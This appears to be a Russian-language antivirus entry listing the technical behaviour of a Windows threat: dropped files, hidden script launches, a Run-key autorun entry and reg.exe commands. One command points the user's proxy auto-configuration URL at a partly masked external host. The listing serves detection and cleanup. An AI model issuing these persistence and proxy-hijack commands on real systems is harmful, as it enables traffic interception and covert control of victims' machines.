Техническая информация
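- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'alicert' = 'C:\Users\Update.exe' (запись автозапуска; судя по командам ниже, ключ Run изменяется 32-битным reg.exe из %WINDIR%\syswow64, поэтому значение оказывается в ветке Wow6432Node — при проверке автозапуска следует просматривать и её)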
- C:\users\date.vbe
- C:\users\ate.exe
- %TEMP%\8bh1lqft.bat
- nul
- %TEMP%\8bh1lqft.bat
- '%WINDIR%\syswow64\wscript.exe' "C:\Users\date.vbe"
- 'C:\users\ate.exe'
- 'C:\users\ate.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8BH1LQFT.bat" "C:\Users\ate.exe" " (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8BH1LQFT.bat" "C:\Users\ate.exe" "
- '%WINDIR%\syswow64\reg.exe' query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
- '%WINDIR%\syswow64\findstr.exe' /i /c:"http://www.go####q.top:9999/key.pac"
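- '%WINDIR%\syswow64\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /d "http://www.go####q.top:9999/key.pac" /f (задаёт для текущего пользователя адрес сценария автоматической настройки прокси (PAC); часть доменного имени в описании скрыта символами ####. При лечении следует проверить и восстановить значение AutoConfigURL)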
- '%WINDIR%\syswow64\reg.exe' query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- '%WINDIR%\syswow64\findstr.exe' /i /c:"C:\Users\Update.exe"
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v alicert /t REG_SZ /d C:\Users\Update.exe /f
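- '%WINDIR%\syswow64\ping.exe' 127.1 -n 3 (обращение к локальному адресу; вероятно, используется как пауза между шагами сценария)
- '%WINDIR%\syswow64\ping.exe' 127.1 -n 2 (то же, вероятно, пауза)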